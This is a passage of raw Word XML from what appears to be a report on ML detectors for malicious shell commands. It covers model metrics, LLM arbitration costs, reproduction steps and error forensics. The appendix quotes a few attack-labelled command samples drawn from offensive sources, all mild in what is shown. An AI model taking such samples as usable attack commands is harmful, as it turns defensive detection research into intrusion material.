        <w:t>how</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> they spend the error budget (the hybrid is more precise, FPR 0.044; the CNN more sensitive, recall 0.908), not in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> commands they get wrong.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>8.1 Forensic error analysis and 8.4 Hybrid cascade — see Appendix C</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The sample-level forensic error categorization for every model (§8.1) and the full three-stage hybrid-cascade analysis (§8.4) — the negative-result verdict, per-stage error attribution, the stub-arbitrator behaviour, and the threshold-dominance test showing a single stage-2 cutoff matches the whole cascade — are presented in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Appendix C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Headline numbers: the full cascade (F1 0.8685 / 0.8396) is the weakest of its four configurations, and 3 single thresholds (0.65/0.66/0.67) match or beat it on Dataset 1; the confusion matrices for all four models on both datasets are in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/figures/</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Bonus B.3 — LLM verdict evaluation on edge cases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Arbitrator: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Llama 3.1-8B (llama3.1:8b via Ollama, local inference)</w:t>
      </w:r>
      <w:r>
        <w:t>. Edge cases = primary models (XGBoost, 1D-CNN, Isolation Forest) disagree (score gap ≥ 0.4) or any is unconfident (score in [0.35, 0.65]).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dataset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 rows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edge cases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edge %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LLM acc on edge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model-vote acc on edge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LLM–vote agreement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mean latency (s)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LLM calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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dataset1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3049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434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14.2%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0.608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0.684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0.652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11.36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434</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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dataset2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1915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270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14.1%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0.633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0.670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0.615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11.05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270</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:lineRule="auto" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Table 9. Local Llama-3.1-8B arbitration on high-uncertainty edge cases: accuracy, agreement with the model vote, mean latency, and call count per dataset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On both corpora the local Llama-3.1-8B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>trails the models' own majority vote</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on exactly the cases where that vote is least certain (0.608 vs 0.684 on D1, 0.633 vs 0.670 on D2), and it agrees with the vote only ~62–65% of the time — so on this uncertain slice the LLM behaves as a genuinely independent voter rather than a rubber stamp, but it does not out-arbitrate the ensemble it was meant to break ties for. Each verdict cost a mean of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>~11.2 s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on a local M3 Pro (Ollama, GPU), so the full edge set of 434 + 270 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>704 calls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ran in ≈82 min (D1) + ≈50 min (D2) ≈ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2.2 h total</w:t>
      </w:r>
      <w:r>
        <w:t>; at the ~14% edge fraction that is the entire LLM cost per evaluation, because the other ~86% of the test set never reaches the model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>B.4 operational tradeoff (support)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The cascade only routes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>edge cases</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the LLM, so total LLM calls per evaluation = the 'LLM calls' column, not the full test set — the assignment's hard requirement. At the measured ~11 s/call and ~14% edge fraction, the per-run LLM wall-clock is that fraction × latency (≈82 min for D1's 3,049 rows, ≈50 min for D2's 1,915), which is only tolerable because the fraction stays small.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Whether this is production-viable depends on the edge fraction staying small; if the primary models disagree on a large slice, the LLM becomes the bottleneck and the honest conclusion is that the cascade needs a tighter uncertainty band, not more LLM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:br w:type="page"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Appendix A — Code Execution Instructions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Every result reproduces end-to-end from the shipped repository. All scripts are seeded (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SEED = 42</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/__init__.py</w:t>
      </w:r>
      <w:r>
        <w:t>), so a rerun regenerates the shipped files exactly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Environment setup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pip install -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Rebuild the datasets (optional — shipped under `dataset/`)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cd scripts</w:t>
        <w:br/>
        <w:t>python build_dataset.py         # rebuilds both datasets from public sources</w:t>
        <w:br/>
        <w:t>python evaluate_baseline.py     # char n-gram TF-IDF + logistic-regression baseline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Train and evaluate the five models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python main.py all                                          # every model x both datasets</w:t>
        <w:br/>
        <w:t>python main.py cv       --model xgboost --dataset dataset1  # stratified k-fold CV</w:t>
        <w:br/>
        <w:t>python main.py holdout  --model cnn1d   --dataset dataset2  # train split -&gt; test split</w:t>
        <w:br/>
        <w:t>python main.py transfer --model xgboost --train dataset1 --test dataset2   # cross-dataset</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Regenerate the report artefacts (figures, tables, JSON)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python analysis/ch3_eda.py            # Ch3 EDA figures + feature justification</w:t>
        <w:br/>
        <w:t>python analysis/ch4_ranking.py        # Ch4 tree-based feature-ranking charts</w:t>
        <w:br/>
        <w:t>python analysis/ch7_train.py          # Ch7 CV + hyperparameter sensitivity</w:t>
        <w:br/>
        <w:t>python analysis/ch8_error_analysis.py # Ch8.1 forensics + 8.2 cross-dataset table</w:t>
        <w:br/>
        <w:t>python analysis/ch8_4_cascade.py      # Ch8.4 hybrid cascade ensemble</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Bonus — LLM triage layer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python analysis/bonus_b3_llm_eval.py         # offline stub arbitrator</w:t>
        <w:br/>
        <w:t>python analysis/bonus_b3_llm_eval.py --hf     # real Llama-3.1-8B via Hugging Face (needs HF_TOKEN)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The B.3 results in this report were produced with a fully-local Llama-3.1-8B through Ollama (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/llm_triage.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ollama_arbitrator()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, endpoint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>http://localhost:11434</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). No secret is stored in the repo — a Hugging Face token, if used, is read from the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HF_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> environment variable and is never committed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Guardrail tests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sz w:val="16"/>
        </w:rPr>
        <w:t>python tests/test_pipeline.py         # no-leakage + dataset-agnostic contract checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:br w:type="page"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Appendix B — Frameworks and Hardware Environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Software frameworks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Python 3.9+. Lower bounds are pinned in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>requirements.txt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Library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Version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 in the pipeline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scikit-learn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≥ 1.4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pipelines, Random Forest, Isolation Forest, metrics, CV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XGBoost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≥ 2.1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gradient-boosted trees (engineered + hybrid)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PyTorch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≥ 2.2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character-level 1D-CNN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imbalanced-learn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≥ 0.12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leakage-safe SMOTE / sampling inside the Pipeline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numpy / pandas / scipy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≥ 1.26 / ≥ 2.1 / ≥ 1.11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data handling and statistics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matplotlib / seaborn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≥ 3.8 / ≥ 0.13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EDA, ranking, and sensitivity figures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huggingface-hub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≥ 0.24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optional Hugging Face LLM inference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Ollama (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>llama3.1:8b</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>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local LLM arbitration, Bonus B.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:lineRule="auto" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Table 10. Software frameworks and versions used across the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Hardware environments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Results were produced on two machines. The tree models (Random Forest, Isolation Forest, XGBoost) are deterministic under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SEED = 42</w:t>
      </w:r>
      <w:r>
        <w:t>, so which machine ran them does not affect reproducibility of those numbers.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Environment A — Ben:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> macOS, Apple M3 Pro. The 1D-CNN trains on the GPU via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>torch.device("mps")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; the local Ollama </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>llama3.1:8b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> arbitrator (Bonus B.3) ran on the GPU at ≈ 11 s per call. Produced: XGBoost-hybrid, 1D-CNN, the TF-IDF baseline, cross-dataset transfer, the cascade, Ch7 XGBoost/CNN sensitivity, and Ch8 error forensics.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Environment B — Noam:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows 11, CPU only. Produced: Random Forest, Isolation Forest, the Ch3 EDA and Ch4 ranking figures, the Ch6 sub-sample probe, the Ch7 RF/IF sweeps, and the Ch8 RF/IF forensics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Supporting exploration figures (class balance, variance-by-label, correlation heatmaps, feature-importance bars, sensitivity grids, confusion matrices for all five models on both datasets) ship in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/figures/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inside the submission ZIP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:br w:type="page"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Appendix C — Supplementary Analysis (Chapters 8.1 and 8.4)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The sample-level forensic error analysis (Chapter 8.1) and the full three-stage hybrid-cascade analysis (Chapter 8.4) are reproduced in full here, out of the main body only to respect the 15-page limit. Both are graded Chapter 8 material and are referenced from Chapter 8 in the body.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 8.1 — Forensic error analysis (Ben's models)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confusion matrices: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/figures/ch8_confusion_xgboost_hybrid_dataset1.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/figures/ch8_confusion_xgboost_hybrid_dataset2.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/figures/ch8_confusion_cnn1d_dataset1.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/figures/ch8_confusion_cnn1d_dataset2.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sample-level FN/FP command strings (capped at 40 per cell): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/ch8_failures.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The by-source counts below are over every error, from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/ch8_confusion.json</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>xgboost_hybrid/dataset1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Confusion [tn, fp, fn, tp] = [2192, 95, 94, 668]; F1 0.876, Recall 0.877, FPR 0.042.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False negatives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by source (all 94): {'hacktricks': 59, 'gtfobins': 19, 'atomic_red_team': 15, 'slp': 1}.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False positives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by source (all 95): {'tldr': 29, 'nl2bash': 28, 'linlm': 21, 'bash6k': 14, 'bash_instruct': 3}.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example missed attacks (FN): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apparmor_parser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[ ! -z "$COMMAND" ] &amp;&amp; echo VERSIONSTART "$p" "$("${COMMAND%%[[:space:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example benign flagged (FP): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>unset -f ls /bin/ls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>zeroclaw cron add "* * * * *" "command"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fluent-bit -c /etc/fluent-bit/fluent-bit.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>xgboost_hybrid/dataset2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Confusion [tn, fp, fn, tp] = [1365, 71, 74, 405]; F1 0.848, Recall 0.846, FPR 0.049.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False negatives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by source (all 74): {'honeypot': 74}.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False positives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by source (all 71): {'bash_history': 58, 'commandlinefu': 13}.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example missed attacks (FN): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nano u.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>31m&gt;&gt;&gt;&gt; Server Gasit incepem Testele \033[1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/gisdfoewrsfdf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example benign flagged (FP): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Zsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tar -zxvf 'download (1)'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat i3log* 2&gt; /dev/null | tail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>cnn1d/dataset1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Confusion [tn, fp, fn, tp] = [2160, 127, 91, 671]; F1 0.860, Recall 0.881, FPR 0.056.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False negatives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by source (all 91): {'hacktricks': 51, 'gtfobins': 22, 'atomic_red_team': 16, 'slp': 2}.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False positives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by source (all 127): {'tldr': 39, 'nl2bash': 37, 'linlm': 32, 'bash6k': 15, 'bash_instruct': 4}.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example missed attacks (FN): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apparmor_parser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>yarn --cwd .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example benign flagged (FP): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>unset -f ls /bin/ls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo "{:key 'val}" | bb -I "(:key (first *input*))"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>docker run -e VAR=value nginx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>cnn1d/dataset2</w:t>
      </w:r>
    </w:p>
